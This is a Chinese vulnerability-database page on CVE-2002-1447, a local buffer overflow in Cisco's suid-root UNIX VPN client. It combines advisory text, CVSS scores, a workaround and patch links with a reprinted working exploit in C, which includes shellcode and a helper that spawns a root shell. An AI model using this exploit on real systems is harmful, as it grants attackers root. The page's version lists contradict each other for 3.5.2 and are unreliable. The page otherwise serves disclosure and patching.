CVE-2002-1447
CVSS7.2
发布时间 :2002-05-28 00:00:00
修订时间 :2008-09-05 16:30:37
NMCOES    

[原文]Buffer overflow in the vpnclient program for UNIX VPN Client before 3.5.2 allows local users to gain administrative privileges via a long profile name in a connect argument.


[CNNVD]Unix下的Cisco VPN客户端本地缓冲区溢出漏洞(CNNVD-200205-052)

        
        Cisco VPN客户端用于在客户端机器和CISCO VPN集中器之间建立VPN连接。
        Cisco VPN客户端在处理参数时缺少充分检查,本地攻击者可以利用这个漏洞进行缓冲区溢出攻击。
        Cisco VPN客户端默认在系统中以suid root属性安装,程序对用户提交给"connect"参数的数据缺少正确充分的检查,攻击者可以提交超长的档案文件名(超过520字节)给"connect"参数就可以造成缓冲区溢出,精心构建档案文件名数据就可能以root权限在系统中执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1447
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1447
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200205-052
(官方数据源) CNNVD

- 其它链接及资源

http://sec.angrypacket.com/advisories/0002_AP.vpnclient.txt
(VENDOR_ADVISORY)  MISC  http://sec.angrypacket.com/advisories/0002_AP.vpnclient.txt
http://www.securityfocus.com/bid/5056
(UNKNOWN)  BID  5056
http://www.iss.net/security_center/static/9376.php
(UNKNOWN)  XF  ciscovpn-profile-name-bo(9376)
http://www.cisco.com/warp/public/707/cisco-unix-vpnclient-buffer-overflow-pub.shtml
(UNKNOWN)  CISCO  20020619 Buffer Overflow in UNIX VPN Client
http://online.securityfocus.com/archive/1/277653
(UNKNOWN)  BUGTRAQ  20020619 [AP] Cisco vpnclient buffer overflow

- 漏洞信息

Unix下的Cisco VPN客户端本地缓冲区溢出漏洞
高危 边界条件错误
2002-05-28 00:00:00 2005-06-06 00:00:00
本地  
        
        Cisco VPN客户端用于在客户端机器和CISCO VPN集中器之间建立VPN连接。
        Cisco VPN客户端在处理参数时缺少充分检查,本地攻击者可以利用这个漏洞进行缓冲区溢出攻击。
        Cisco VPN客户端默认在系统中以suid root属性安装,程序对用户提交给"connect"参数的数据缺少正确充分的检查,攻击者可以提交超长的档案文件名(超过520字节)给"connect"参数就可以造成缓冲区溢出,精心构建档案文件名数据就可能以root权限在系统中执行任意指令。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * /bin/chmod 755 /usr/local/bin/vpnclient
        厂商补丁:
        Cisco
        -----
        Cisco已经为此发布了一个安全公告(Cisco-unix-vpnclient-bof)以及相应补丁:
        Cisco-unix-vpnclient-bof:Buffer Overflow in UNIX VPN Client
        链接:
        http://www.cisco.com/warp/public/707/cisco-unix-vpnclient-buffer-overflow-pub.shtml

        补丁下载:
        
        http://www.cisco.com

- 漏洞信息 (21568)

Cisco VPN Client for Unix 3.5.1 Local Buffer Overflow Vulnerability (EDBID:21568)
linux local
2002-06-19 Verified
0 methodic
N/A [点击下载]
source: http://www.securityfocus.com/bid/5056/info

The Cisco VPN Client software is used to establish Virtual Private Network (VPN) connections between client machines and a Cisco VPN Concentrator.

A vulnerability has been reported in some versions of the VPN Client. If an oversized profile name is passed to the vpnclient binary, a buffer overflow condition may occur. As vpnclient runs suid root, exploitation of this vulnerability will grant a local attacker root access to the vulnerable system.

This vulnerability affects the VPN Client version 3.5.1 for Linux, Solaris and Mac OS X. Windows clients are not believed to be vulnerable. Earlier versions of the VPN Client may share this vulnerability, although this has not been confirmed. 

/* buffer overflow for cisco's vpnclient for linux
   tested against the latest release: vpnclient-linux-3.5.1.Rel-k9.tar.gz

   to get this to properly work, you need to put the following code into
   xx.c, compile it (as xx), and place the executable into /tmp (to bypass
   tight PAM restrictions)

   #include <stdio.h>
   main() {
     setuid(0);
     execl("/bin/sh", "sh", NULL);
   }

   then compile this and run it. syntax is ./vpnclient <offset>
   tested under gentoo linux and debian:
   $ ls -la `which vpnclient`
   -rws--x--x    1 root   root   160900 Apr 13 22:34 /usr/local/bin/vpnclient
   $ ./vpnKILLient 
   addr: 0xbffffbac, offset: 0
   Cisco Systems VPN Client Version 3.5.1 (Rel)
   Copyright (C) 1998-2002 Cisco Systems, Inc. All Rights Reserved.
   Client Type(s): Linux
   Running on: Linux 2.4.17 #1 Sat Apr 13 21:53:52 EDT 2002 i686

   sh-2.05a# id
   uid=0(root) gid=100(users) groups=100(users),10(wheel)

   greetz: all of the angrypacket crew (of course)
           shok  -> pheerable^2;
           vegac -> 31336++;

   when you get a chance, check out http://sec.angrypacket.com
*/

#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define NOP 0x90
#define LEN 620 /* 520 to own eip */

/* shellcode by vegac (setuid(0)->/tmp/xx) */
/* wont work if your /tmp partition is mounted noexec or nosuid */
char shell[]=
        "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
        "\x31\xc0\x50\x68\x2f\x2f\x78\x78"
        "\x68\x2f\x74\x6d\x70\x89\xe3\x31"
        "\xc0\x50\x89\xe2\x54\x89\xe1\xb0"
        "\x0b\xcd\x80\x00";

unsigned long get_sp (void) {
	__asm__("mov %esp,%eax");
}
int main(int argc, char *argv[]) {

	int i, offset=0;
	long addr;
	char *buf, *ptr;

	if(argc > 1) offset = atoi(argv[1]);

	buf = (char *)malloc(sizeof(char) * LEN);
	bzero(buf, LEN);
	addr = get_sp() - offset;
	printf("addr: 0x%x, offset: %d\n", addr, offset);

	for(i = 0; i < LEN; i += 4) {
		*(long *)&buf[i] = addr;
	}

	for(i = 0; i < (LEN / 2); i++) {
		*(buf + i) = NOP;
	}

	ptr = buf + ((LEN / 2) - (strlen(shell) / 2));
	for(i = 0; i < strlen(shell); i++) {
		*(ptr++) = shell[i];
	}
	buf[LEN - 1] = '\0';

	execl("/usr/local/bin/vpnclient", "vpnclient", "connect", buf, 0);
	return(0);

}
		

- 漏洞信息

14494
Cisco Unix VPN Client Profile Name Overflow
Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2002-06-19 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Cisco VPN Client for Unix Local Buffer Overflow Vulnerability
Boundary Condition Error 5056
No Yes
2002-06-19 12:00:00 2009-07-11 01:56:00
Discovered by methodic <methodic@bigunz.angrypacket.com> and Josha Bronson.

- 受影响的程序版本

Cisco VPN Client for Solaris 3.5.1
Cisco VPN Client for Mac OS X 3.5.1
Cisco VPN Client for Linux 3.5.1
Cisco VPN Client for Solaris 3.5.2
Cisco VPN Client for Mac OS X 3.5.2
Cisco VPN Client for Linux 3.5.2

- 不受影响的程序版本

Cisco VPN Client for Solaris 3.5.2
Cisco VPN Client for Mac OS X 3.5.2
Cisco VPN Client for Linux 3.5.2

- 漏洞讨论

The Cisco VPN Client software is used to establish Virtual Private Network (VPN) connections between client machines and a Cisco VPN Concentrator.

A vulnerability has been reported in some versions of the VPN Client. If an oversized profile name is passed to the vpnclient binary, a buffer overflow condition may occur. As vpnclient runs suid root, exploitation of this vulnerability will grant a local attacker root access to the vulnerable system.

This vulnerability affects the VPN Client version 3.5.1 for Linux, Solaris and Mac OS X. Windows clients are not believed to be vulnerable. Earlier versions of the VPN Client may share this vulnerability, although this has not been confirmed.

- 漏洞利用

An exploit has been provided by methodic &lt;methodic@bigunz.angrypacket.com&gt;:

- 解决方案

This issue has been resolved in version 3.5.2 of the Cisco VPN Client, available immediately. Customers are advised to contact their regular upgrade channels for the fixed version, or to visit the Cisco Software Center at the following URL:

http://www.cisco.com/public/sw-center/

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站